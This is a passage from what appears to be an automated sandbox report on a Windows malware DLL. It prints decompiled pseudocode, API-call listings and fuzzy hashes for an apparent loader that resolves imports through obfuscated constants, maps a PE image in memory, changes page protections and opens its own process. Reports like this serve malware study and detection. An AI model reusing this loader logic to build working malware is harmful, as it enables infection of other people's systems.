                                                                                                                0x6e1f16f1
                                                                                                                0x6e1f16f8
                                                                                                                0x6e1f16fa
                                                                                                                0x6e1f16ff
                                                                                                                0x6e1f1701
                                                                                                                0x6e1f1705
                                                                                                                0x6e1f170f
                                                                                                                0x6e1f1714

                                                                                                                APIs
                                                                                                                • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(6E1F1E82,00000001,6E1F414C,00000000), ref: 6E1F170F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492699725.000000006E1F1000.00000020.00020000.sdmp, Offset: 6E1F0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.492671611.000000006E1F0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.492733821.000000006E1F3000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.492766888.000000006E1F5000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.492808881.000000006E1F6000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: DescriptorSecurity$ConvertString
                                                                                                                • String ID:
                                                                                                                • API String ID: 3907675253-0
                                                                                                                • Opcode ID: 62f364ff9f34d1f586590f5367b2415e845b7d58a69aa7bbd7e8ddd7c1f4d473
                                                                                                                • Instruction ID: ecf84d525d305693c4370047df150abdef1cf79737bfea4b788b0d647b67d93b
                                                                                                                • Opcode Fuzzy Hash: 62f364ff9f34d1f586590f5367b2415e845b7d58a69aa7bbd7e8ddd7c1f4d473
                                                                                                                • Instruction Fuzzy Hash: EEC04CB4248780E6EA209F809D49F467AD17762705F118505B115252D1C3F6209AB595
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 86%
                                                                                                                			E6E1F1634(void* __eax) {
                                                                                                                				char _v8;
                                                                                                                				void* _v12;
                                                                                                                				void* __edi;
                                                                                                                				void* _t18;
                                                                                                                				long _t24;
                                                                                                                				long _t26;
                                                                                                                				long _t29;
                                                                                                                				intOrPtr _t40;
                                                                                                                				void* _t41;
                                                                                                                				intOrPtr* _t42;
                                                                                                                				void* _t44;
                                                                                                                
                                                                                                                				_t41 = __eax;
                                                                                                                				_t16 =  *0x6e1f4140;
                                                                                                                				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e1f4140 - 0x63698bc4 &  !( *0x6e1f4140 - 0x63698bc4);
                                                                                                                				_t18 = E6E1F1146( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e1f4140 - 0x63698bc4 &  !( *0x6e1f4140 - 0x63698bc4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e1f4140 - 0x63698bc4 &  !( *0x6e1f4140 - 0x63698bc4), _t16 + 0x9c96647d,  &_v8,  &_v12); // executed
                                                                                                                				if(_t18 != 0) {
                                                                                                                					_t29 = 8;
                                                                                                                					goto L8;
                                                                                                                				} else {
                                                                                                                					_t40 = _v8;
                                                                                                                					_t29 = E6E1F1CBE(_t33, _t40, _t41);
                                                                                                                					if(_t29 == 0) {
                                                                                                                						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
                                                                                                                						_t24 = E6E1F1BAC(_t40, _t44); // executed
                                                                                                                						_t29 = _t24;
                                                                                                                						if(_t29 == 0) {
                                                                                                                							_t26 = E6E1F1020(_t44, _t40); // executed
                                                                                                                							_t29 = _t26;
                                                                                                                							if(_t29 == 0) {
                                                                                                                								_push(_t26);
                                                                                                                								_push(1);
                                                                                                                								_push(_t40);
                                                                                                                								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
                                                                                                                									_t29 = GetLastError();
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                					_t42 = _v12;
                                                                                                                					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
                                                                                                                					E6E1F201E(_t42);
                                                                                                                					L8:
                                                                                                                					return _t29;
                                                                                                                				}
                                                                                                                			}














                                                                                                                0x6e1f163c
                                                                                                                0x6e1f163e
                                                                                                                0x6e1f165a
                                                                                                                0x6e1f166b
                                                                                                                0x6e1f1672
                                                                                                                0x6e1f16d0
                                                                                                                0x00000000
                                                                                                                0x6e1f1674
                                                                                                                0x6e1f1674
                                                                                                                0x6e1f167e
                                                                                                                0x6e1f1682
                                                                                                                0x6e1f1687
                                                                                                                0x6e1f168a
                                                                                                                0x6e1f168f
                                                                                                                0x6e1f1693
                                                                                                                0x6e1f1698
                                                                                                                0x6e1f169d
                                                                                                                0x6e1f16a1
                                                                                                                0x6e1f16a6
                                                                                                                0x6e1f16a7
                                                                                                                0x6e1f16ab
                                                                                                                0x6e1f16b0
                                                                                                                0x6e1f16b8
                                                                                                                0x6e1f16b8
                                                                                                                0x6e1f16b0
                                                                                                                0x6e1f16a1
                                                                                                                0x6e1f1693
                                                                                                                0x6e1f16ba
                                                                                                                0x6e1f16c3
                                                                                                                0x6e1f16c7
                                                                                                                0x6e1f16d1
                                                                                                                0x6e1f16d7
                                                                                                                0x6e1f16d7

                                                                                                                APIs
                                                                                                                  • Part of subcall function 6E1F1146: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,6E1F1670,?,?,?,?,?,00000002,?,?), ref: 6E1F116A
                                                                                                                  • Part of subcall function 6E1F1146: GetProcAddress.KERNEL32(00000000,?), ref: 6E1F118C
                                                                                                                  • Part of subcall function 6E1F1146: GetProcAddress.KERNEL32(00000000,?), ref: 6E1F11A2
                                                                                                                  • Part of subcall function 6E1F1146: GetProcAddress.KERNEL32(00000000,?), ref: 6E1F11B8
                                                                                                                  • Part of subcall function 6E1F1146: GetProcAddress.KERNEL32(00000000,?), ref: 6E1F11CE
                                                                                                                  • Part of subcall function 6E1F1146: GetProcAddress.KERNEL32(00000000,?), ref: 6E1F11E4
                                                                                                                  • Part of subcall function 6E1F1CBE: memcpy.NTDLL(00000002,?,6E1F167E,?,?,?,?,?,6E1F167E,?,?,?,?,?,?,?), ref: 6E1F1CF5
                                                                                                                  • Part of subcall function 6E1F1CBE: memcpy.NTDLL(00000002,?,?,?,00000002), ref: 6E1F1D2A
                                                                                                                  • Part of subcall function 6E1F1BAC: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 6E1F1BE4
                                                                                                                  • Part of subcall function 6E1F1020: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 6E1F1059
                                                                                                                  • Part of subcall function 6E1F1020: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6E1F10CE
                                                                                                                  • Part of subcall function 6E1F1020: GetLastError.KERNEL32 ref: 6E1F10D4
                                                                                                                • GetLastError.KERNEL32(?,?), ref: 6E1F16B2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492699725.000000006E1F1000.00000020.00020000.sdmp, Offset: 6E1F0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.492671611.000000006E1F0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.492733821.000000006E1F3000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.492766888.000000006E1F5000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.492808881.000000006E1F6000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
                                                                                                                • String ID:
                                                                                                                • API String ID: 2673762927-0
                                                                                                                • Opcode ID: a1aba098cebfa33500ace8830efd674397a7de9df07157bac5204890ab00f615
                                                                                                                • Instruction ID: 5bdbe499e1a4fa6c527a0c35820674cffa832dd400bddd07f6b10df1c5980d41
                                                                                                                • Opcode Fuzzy Hash: a1aba098cebfa33500ace8830efd674397a7de9df07157bac5204890ab00f615
                                                                                                                • Instruction Fuzzy Hash: E411E9B6700711EBC710DAE988849DF77FCBF542147184515E90197646D7E0E94BA7E0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Non-executed Functions

                                                                                                                APIs
                                                                                                                • _wcscmp.LIBCMT ref: 6E22F2FE
                                                                                                                • _wcscmp.LIBCMT ref: 6E22F30F
                                                                                                                • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,6E22F5AD,?,00000000), ref: 6E22F32B
                                                                                                                • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,6E22F5AD,?,00000000), ref: 6E22F355
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492865179.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: InfoLocale_wcscmp
                                                                                                                • String ID:
                                                                                                                • API String ID: 1351282208-0
                                                                                                                • Opcode ID: bbb0cf4fb2b2597535b94a5e9dd7901cb50064d9b9516ce16748e4b0ad8a6b19
                                                                                                                • Instruction ID: f57fbc90acec9668338f7a858cad6cd7b1ac18a21f2ae44297f5d7b9498004c2
                                                                                                                • Opcode Fuzzy Hash: bbb0cf4fb2b2597535b94a5e9dd7901cb50064d9b9516ce16748e4b0ad8a6b19
                                                                                                                • Instruction Fuzzy Hash: 1A01803621561EAFEB519BA8C844ECB37AE9B05766B10C435F918EA180EB60D981CBD0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E6E1F1F0E() {
                                                                                                                				void* _t1;
                                                                                                                				unsigned int _t3;
                                                                                                                				void* _t4;
                                                                                                                				long _t5;
                                                                                                                				void* _t6;
                                                                                                                				intOrPtr _t10;
                                                                                                                				void* _t14;
                                                                                                                
                                                                                                                				_t10 =  *0x6e1f4130;
                                                                                                                				_t1 = CreateEventA(0, 1, 0, 0);
                                                                                                                				 *0x6e1f413c = _t1;
                                                                                                                				if(_t1 == 0) {
                                                                                                                					return GetLastError();
                                                                                                                				}
                                                                                                                				_t3 = GetVersion();
                                                                                                                				if(_t3 != 5) {
                                                                                                                					L4:
                                                                                                                					if(_t14 <= 0) {
                                                                                                                						_t4 = 0x32;
                                                                                                                						return _t4;
                                                                                                                					} else {
                                                                                                                						goto L5;
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					if(_t3 >> 8 > 0) {
                                                                                                                						L5:
                                                                                                                						 *0x6e1f412c = _t3;
                                                                                                                						_t5 = GetCurrentProcessId();
                                                                                                                						 *0x6e1f4128 = _t5;
                                                                                                                						 *0x6e1f4130 = _t10;
                                                                                                                						_t6 = OpenProcess(0x10047a, 0, _t5);
                                                                                                                						 *0x6e1f4124 = _t6;
                                                                                                                						if(_t6 == 0) {
                                                                                                                							 *0x6e1f4124 =  *0x6e1f4124 | 0xffffffff;
                                                                                                                						}
                                                                                                                						return 0;
                                                                                                                					} else {
                                                                                                                						_t14 = _t3 - _t3;
                                                                                                                						goto L4;
                                                                                                                					}
                                                                                                                				}
                                                                                                                			}










                                                                                                                0x6e1f1f0f
                                                                                                                0x6e1f1f1d
                                                                                                                0x6e1f1f23
                                                                                                                0x6e1f1f2a
                                                                                                                0x6e1f1f81
                                                                                                                0x6e1f1f81
                                                                                                                0x6e1f1f2c
                                                                                                                0x6e1f1f34
                                                                                                                0x6e1f1f41
                                                                                                                0x6e1f1f41
                                                                                                                0x6e1f1f7d
                                                                                                                0x6e1f1f7f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x6e1f1f36
                                                                                                                0x6e1f1f3d
                                                                                                                0x6e1f1f43
                                                                                                                0x6e1f1f43
                                                                                                                0x6e1f1f48
                                                                                                                0x6e1f1f56
                                                                                                                0x6e1f1f5b
                                                                                                                0x6e1f1f61
                                                                                                                0x6e1f1f67
                                                                                                                0x6e1f1f6e
                                                                                                                0x6e1f1f70
                                                                                                                0x6e1f1f70
                                                                                                                0x6e1f1f7a
                                                                                                                0x6e1f1f3f
                                                                                                                0x6e1f1f3f
                                                                                                                0x00000000
                                                                                                                0x6e1f1f3f
                                                                                                                0x6e1f1f3d

                                                                                                                APIs
                                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E1F1462,74B063F0), ref: 6E1F1F1D
                                                                                                                • GetVersion.KERNEL32 ref: 6E1F1F2C
                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 6E1F1F48
                                                                                                                • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E1F1F61
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492699725.000000006E1F1000.00000020.00020000.sdmp, Offset: 6E1F0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.492671611.000000006E1F0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.492733821.000000006E1F3000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.492766888.000000006E1F5000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.492808881.000000006E1F6000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Process$CreateCurrentEventOpenVersion
                                                                                                                • String ID:
                                                                                                                • API String ID: 845504543-0
                                                                                                                • Opcode ID: 356c1a5be1a28f040dff10c54445607e886c6756ca577695402485ed4adcb41c
                                                                                                                • Instruction ID: df17b7e0d088c4352ab50928f952ce34235205329ec792eb4b5fee6d65442e1e
                                                                                                                • Opcode Fuzzy Hash: 356c1a5be1a28f040dff10c54445607e886c6756ca577695402485ed4adcb41c
                                                                                                                • Instruction Fuzzy Hash: 3AF0A4B0658B11DBDF405BA8BD197983BE0A717712F208116F543C61C4D370A187BBC9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,`Y"n,?,6E225960,?,20001004,?,00000002,?,00000004,?,00000000), ref: 6E222A4D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492865179.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: InfoLocale
                                                                                                                • String ID: `Y"n
                                                                                                                • API String ID: 2299586839-1958164319
                                                                                                                • Opcode ID: 8930013390cf8e374a3872ef3b47013828a5f080b7b48ca2c546e5277cf1e573
                                                                                                                • Instruction ID: daf446842aa399e1ee41ce16c80c02cce5ebd373cdcb52d2c85a45e40f7b34ae
                                                                                                                • Opcode Fuzzy Hash: 8930013390cf8e374a3872ef3b47013828a5f080b7b48ca2c546e5277cf1e573
                                                                                                                • Instruction Fuzzy Hash: E3D017B300010EEF8F019FE4E8498AA3BABFB09224B404810F91846010D7B3A520DB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,6E223B82,?,?,?,6E2E1304), ref: 6E21FEBF
                                                                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,6E2E1304), ref: 6E21FEC8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492865179.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                • String ID:
                                                                                                                • API String ID: 3192549508-0
                                                                                                                • Opcode ID: 596fc162931161d09aaf11ce60f597ba763613fd4decfa90f00c40f15c72987e
                                                                                                                • Instruction ID: 327189c6577858047b15a2dd2e1fc2a15667eed2ce8938f1c63a6769fce9d87c
                                                                                                                • Opcode Fuzzy Hash: 596fc162931161d09aaf11ce60f597ba763613fd4decfa90f00c40f15c72987e
                                                                                                                • Instruction Fuzzy Hash: 24B09231248608FBCF142BD5E80DB587F6AEB06652F004091F60D44051DBB39812CEB6
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E6E1F23A5(long _a4) {
                                                                                                                				intOrPtr _v8;
                                                                                                                				intOrPtr _v12;
                                                                                                                				signed int _v16;
                                                                                                                				short* _v32;
                                                                                                                				void _v36;
                                                                                                                				void* _t57;
                                                                                                                				signed int _t58;
                                                                                                                				signed int _t61;
                                                                                                                				signed int _t62;
                                                                                                                				void* _t63;
                                                                                                                				signed int* _t68;
                                                                                                                				intOrPtr* _t69;
                                                                                                                				intOrPtr* _t71;
                                                                                                                				intOrPtr _t72;
                                                                                                                				intOrPtr _t75;
                                                                                                                				void* _t76;
                                                                                                                				signed int _t77;
                                                                                                                				void* _t78;
                                                                                                                				void _t80;
                                                                                                                				signed int _t81;
                                                                                                                				signed int _t84;
                                                                                                                				signed int _t86;
                                                                                                                				short* _t87;
                                                                                                                				void* _t89;
                                                                                                                				signed int* _t90;
                                                                                                                				long _t91;
                                                                                                                				signed int _t93;
                                                                                                                				signed int _t94;
                                                                                                                				signed int _t100;
                                                                                                                				signed int _t102;
                                                                                                                				void* _t104;
                                                                                                                				long _t108;
                                                                                                                				signed int _t110;
                                                                                                                
                                                                                                                				_t108 = _a4;
                                                                                                                				_t76 =  *(_t108 + 8);
                                                                                                                				if((_t76 & 0x00000003) != 0) {
                                                                                                                					L3:
                                                                                                                					return 0;
                                                                                                                				}
                                                                                                                				_a4 =  *[fs:0x4];
                                                                                                                				_v8 =  *[fs:0x8];
                                                                                                                				if(_t76 < _v8 || _t76 >= _a4) {
                                                                                                                					_t102 =  *(_t108 + 0xc);
                                                                                                                					__eflags = _t102 - 0xffffffff;
                                                                                                                					if(_t102 != 0xffffffff) {
                                                                                                                						_t91 = 0;
                                                                                                                						__eflags = 0;
                                                                                                                						_a4 = 0;
                                                                                                                						_t57 = _t76;
                                                                                                                						do {
                                                                                                                							_t80 =  *_t57;
                                                                                                                							__eflags = _t80 - 0xffffffff;
                                                                                                                							if(_t80 == 0xffffffff) {
                                                                                                                								goto L9;
                                                                                                                							}
                                                                                                                							__eflags = _t80 - _t91;
                                                                                                                							if(_t80 >= _t91) {
                                                                                                                								L20:
                                                                                                                								_t63 = 0;
                                                                                                                								L60:
                                                                                                                								return _t63;
                                                                                                                							}
                                                                                                                							L9:
                                                                                                                							__eflags =  *(_t57 + 4);
                                                                                                                							if( *(_t57 + 4) != 0) {
                                                                                                                								_t12 =  &_a4;
                                                                                                                								 *_t12 = _a4 + 1;
                                                                                                                								__eflags =  *_t12;
                                                                                                                							}
                                                                                                                							_t91 = _t91 + 1;
                                                                                                                							_t57 = _t57 + 0xc;
                                                                                                                							__eflags = _t91 - _t102;
                                                                                                                						} while (_t91 <= _t102);
                                                                                                                						__eflags = _a4;
                                                                                                                						if(_a4 == 0) {
                                                                                                                							L15:
                                                                                                                							_t81 =  *0x6e1f4178;
                                                                                                                							_t110 = _t76 & 0xfffff000;
                                                                                                                							_t58 = 0;
                                                                                                                							__eflags = _t81;
                                                                                                                							if(_t81 <= 0) {
                                                                                                                								L18:
                                                                                                                								_t104 = _t102 | 0xffffffff;
                                                                                                                								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                                                                                                                								__eflags = _t61;
                                                                                                                								if(_t61 < 0) {
                                                                                                                									_t62 = 0;
                                                                                                                									__eflags = 0;
                                                                                                                								} else {
                                                                                                                									_t62 = _a4;
                                                                                                                								}
                                                                                                                								__eflags = _t62;
                                                                                                                								if(_t62 == 0) {
                                                                                                                									L59:
                                                                                                                									_t63 = _t104;
                                                                                                                									goto L60;
                                                                                                                								} else {
                                                                                                                									__eflags = _v12 - 0x1000000;
                                                                                                                									if(_v12 != 0x1000000) {
                                                                                                                										goto L59;
                                                                                                                									}
                                                                                                                									__eflags = _v16 & 0x000000cc;
                                                                                                                									if((_v16 & 0x000000cc) == 0) {
                                                                                                                										L46:
                                                                                                                										_t63 = 1;
                                                                                                                										 *0x6e1f41c0 = 1;
                                                                                                                										__eflags =  *0x6e1f41c0;
                                                                                                                										if( *0x6e1f41c0 != 0) {
                                                                                                                											goto L60;
                                                                                                                										}
                                                                                                                										_t84 =  *0x6e1f4178;
                                                                                                                										__eflags = _t84;
                                                                                                                										_t93 = _t84;
                                                                                                                										if(_t84 <= 0) {
                                                                                                                											L51:
                                                                                                                											__eflags = _t93;
                                                                                                                											if(_t93 != 0) {
                                                                                                                												L58:
                                                                                                                												 *0x6e1f41c0 = 0;
                                                                                                                												goto L5;
                                                                                                                											}
                                                                                                                											_t77 = 0xf;
                                                                                                                											__eflags = _t84 - _t77;
                                                                                                                											if(_t84 <= _t77) {
                                                                                                                												_t77 = _t84;
                                                                                                                											}
                                                                                                                											_t94 = 0;
                                                                                                                											__eflags = _t77;
                                                                                                                											if(_t77 < 0) {
                                                                                                                												L56:
                                                                                                                												__eflags = _t84 - 0x10;
                                                                                                                												if(_t84 < 0x10) {
                                                                                                                													_t86 = _t84 + 1;
                                                                                                                													__eflags = _t86;
                                                                                                                													 *0x6e1f4178 = _t86;
                                                                                                                												}
                                                                                                                												goto L58;
                                                                                                                											} else {
                                                                                                                												do {
                                                                                                                													_t68 = 0x6e1f4180 + _t94 * 4;
                                                                                                                													_t94 = _t94 + 1;
                                                                                                                													__eflags = _t94 - _t77;
                                                                                                                													 *_t68 = _t110;
                                                                                                                													_t110 =  *_t68;
                                                                                                                												} while (_t94 <= _t77);
                                                                                                                												goto L56;
                                                                                                                											}
                                                                                                                										}
                                                                                                                										_t69 = 0x6e1f417c + _t84 * 4;
                                                                                                                										while(1) {
                                                                                                                											__eflags =  *_t69 - _t110;
                                                                                                                											if( *_t69 == _t110) {
                                                                                                                												goto L51;
                                                                                                                											}
                                                                                                                											_t93 = _t93 - 1;
                                                                                                                											_t69 = _t69 - 4;
                                                                                                                											__eflags = _t93;
                                                                                                                											if(_t93 > 0) {
                                                                                                                												continue;
                                                                                                                											}
                                                                                                                											goto L51;
                                                                                                                										}
                                                                                                                										goto L51;
                                                                                                                									}
                                                                                                                									_t87 = _v32;
                                                                                                                									__eflags =  *_t87 - 0x5a4d;
                                                                                                                									if( *_t87 != 0x5a4d) {
                                                                                                                										goto L59;
                                                                                                                									}
                                                                                                                									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                                                                                                                									__eflags =  *_t71 - 0x4550;
                                                                                                                									if( *_t71 != 0x4550) {
                                                                                                                										goto L59;
                                                                                                                									}
                                                                                                                									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                                                                                                                									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                                                                                                                										goto L59;
                                                                                                                									}
                                                                                                                									_t78 = _t76 - _t87;
                                                                                                                									__eflags =  *((short*)(_t71 + 6));
                                                                                                                									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                                                                                                                									if( *((short*)(_t71 + 6)) <= 0) {
                                                                                                                										goto L59;
                                                                                                                									}
                                                                                                                									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                                                                                                                									__eflags = _t78 - _t72;
                                                                                                                									if(_t78 < _t72) {
                                                                                                                										goto L46;
                                                                                                                									}
                                                                                                                									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                                                                                                                									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                                                                                                                										goto L46;
                                                                                                                									}
                                                                                                                									__eflags =  *(_t89 + 0x27) & 0x00000080;
                                                                                                                									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                                                                                                                										goto L20;
                                                                                                                									}
                                                                                                                									goto L46;
                                                                                                                								}
                                                                                                                							} else {
                                                                                                                								goto L16;
                                                                                                                							}
                                                                                                                							while(1) {
                                                                                                                								L16:
                                                                                                                								__eflags =  *((intOrPtr*)(0x6e1f4180 + _t58 * 4)) - _t110;
                                                                                                                								if( *((intOrPtr*)(0x6e1f4180 + _t58 * 4)) == _t110) {
                                                                                                                									break;
                                                                                                                								}
                                                                                                                								_t58 = _t58 + 1;
                                                                                                                								__eflags = _t58 - _t81;
                                                                                                                								if(_t58 < _t81) {
                                                                                                                									continue;
                                                                                                                								}
                                                                                                                								goto L18;
                                                                                                                							}
                                                                                                                							__eflags = _t58;
                                                                                                                							if(_t58 <= 0) {
                                                                                                                								goto L5;
                                                                                                                							}
                                                                                                                							 *0x6e1f41c0 = 1;
                                                                                                                							__eflags =  *0x6e1f41c0;
                                                                                                                							if( *0x6e1f41c0 != 0) {
                                                                                                                								goto L5;
                                                                                                                							}
                                                                                                                							__eflags =  *((intOrPtr*)(0x6e1f4180 + _t58 * 4)) - _t110;
                                                                                                                							if( *((intOrPtr*)(0x6e1f4180 + _t58 * 4)) == _t110) {
                                                                                                                								L32:
                                                                                                                								_t100 = 0;
                                                                                                                								__eflags = _t58;
                                                                                                                								if(_t58 < 0) {
                                                                                                                									L34:
                                                                                                                									 *0x6e1f41c0 = 0;
                                                                                                                									goto L5;
                                                                                                                								} else {
                                                                                                                									goto L33;
                                                                                                                								}
                                                                                                                								do {
                                                                                                                									L33:
                                                                                                                									_t90 = 0x6e1f4180 + _t100 * 4;
                                                                                                                									_t100 = _t100 + 1;
                                                                                                                									__eflags = _t100 - _t58;
                                                                                                                									 *_t90 = _t110;
                                                                                                                									_t110 =  *_t90;
                                                                                                                								} while (_t100 <= _t58);
                                                                                                                								goto L34;
                                                                                                                							}
                                                                                                                							_t58 = _t81 - 1;
                                                                                                                							__eflags = _t58;
                                                                                                                							if(_t58 < 0) {
                                                                                                                								L28:
                                                                                                                								__eflags = _t81 - 0x10;
                                                                                                                								if(_t81 < 0x10) {
                                                                                                                									_t81 = _t81 + 1;
                                                                                                                									__eflags = _t81;
                                                                                                                									 *0x6e1f4178 = _t81;
                                                                                                                								}
                                                                                                                								_t58 = _t81 - 1;
                                                                                                                								goto L32;
                                                                                                                							} else {
                                                                                                                								goto L25;
                                                                                                                							}
                                                                                                                							while(1) {
                                                                                                                								L25:
                                                                                                                								__eflags =  *((intOrPtr*)(0x6e1f4180 + _t58 * 4)) - _t110;
                                                                                                                								if( *((intOrPtr*)(0x6e1f4180 + _t58 * 4)) == _t110) {
                                                                                                                									break;
                                                                                                                								}
                                                                                                                								_t58 = _t58 - 1;
                                                                                                                								__eflags = _t58;
                                                                                                                								if(_t58 >= 0) {
                                                                                                                									continue;
                                                                                                                								}
                                                                                                                								break;
                                                                                                                							}
                                                                                                                							__eflags = _t58;
                                                                                                                							if(__eflags >= 0) {
                                                                                                                								if(__eflags == 0) {
                                                                                                                									goto L34;
                                                                                                                								}
                                                                                                                								goto L32;
                                                                                                                							}
                                                                                                                							goto L28;
                                                                                                                						}
                                                                                                                						_t75 =  *((intOrPtr*)(_t108 - 8));
                                                                                                                						__eflags = _t75 - _v8;
                                                                                                                						if(_t75 < _v8) {
                                                                                                                							goto L20;
                                                                                                                						}
                                                                                                                						__eflags = _t75 - _t108;
                                                                                                                						if(_t75 >= _t108) {
                                                                                                                							goto L20;
                                                                                                                						}
                                                                                                                						goto L15;
                                                                                                                					}
                                                                                                                					L5:
                                                                                                                					_t63 = 1;
                                                                                                                					goto L60;
                                                                                                                				} else {
                                                                                                                					goto L3;
                                                                                                                				}
                                                                                                                			}




































                                                                                                                0x6e1f23af
                                                                                                                0x6e1f23b2
                                                                                                                0x6e1f23b8
                                                                                                                0x6e1f23d6
                                                                                                                0x00000000
                                                                                                                0x6e1f23d6
                                                                                                                0x6e1f23c0
                                                                                                                0x6e1f23c9
                                                                                                                0x6e1f23cf
                                                                                                                0x6e1f23de
                                                                                                                0x6e1f23e1
                                                                                                                0x6e1f23e4
                                                                                                                0x6e1f23ee
                                                                                                                0x6e1f23ee
                                                                                                                0x6e1f23f0
                                                                                                                0x6e1f23f3
                                                                                                                0x6e1f23f5
                                                                                                                0x6e1f23f5
                                                                                                                0x6e1f23f7
                                                                                                                0x6e1f23fa
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x6e1f23fc
                                                                                                                0x6e1f23fe
                                                                                                                0x6e1f2464
                                                                                                                0x6e1f2464
                                                                                                                0x6e1f25c2
                                                                                                                0x00000000
                                                                                                                0x6e1f25c2
                                                                                                                0x6e1f2400
                                                                                                                0x6e1f2400
                                                                                                                0x6e1f2404
                                                                                                                0x6e1f2406
                                                                                                                0x6e1f2406
                                                                                                                0x6e1f2406
                                                                                                                0x6e1f2406
                                                                                                                0x6e1f2409
                                                                                                                0x6e1f240a
                                                                                                                0x6e1f240d
                                                                                                                0x6e1f240d
                                                                                                                0x6e1f2411
                                                                                                                0x6e1f2415
                                                                                                                0x6e1f2423
                                                                                                                0x6e1f2423
                                                                                                                0x6e1f242b
                                                                                                                0x6e1f2431
                                                                                                                0x6e1f2433
                                                                                                                0x6e1f2435
                                                                                                                0x6e1f2445
                                                                                                                0x6e1f2452
                                                                                                                0x6e1f2456
                                                                                                                0x6e1f245b
                                                                                                                0x6e1f245d
                                                                                                                0x6e1f24db
                                                                                                                0x6e1f24db
                                                                                                                0x6e1f245f
                                                                                                                0x6e1f245f
                                                                                                                0x6e1f245f
                                                                                                                0x6e1f24dd
                                                                                                                0x6e1f24df
                                                                                                                0x6e1f25c0
                                                                                                                0x6e1f25c0
                                                                                                                0x00000000
                                                                                                                0x6e1f24e5
                                                                                                                0x6e1f24e5
                                                                                                                0x6e1f24ec
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x6e1f24f2
                                                                                                                0x6e1f24f6
                                                                                                                0x6e1f2552
                                                                                                                0x6e1f2554
                                                                                                                0x6e1f255c
                                                                                                                0x6e1f255e
                                                                                                                0x6e1f2560
                                                                                                                0x00000000
                                                                                                                0x00000000
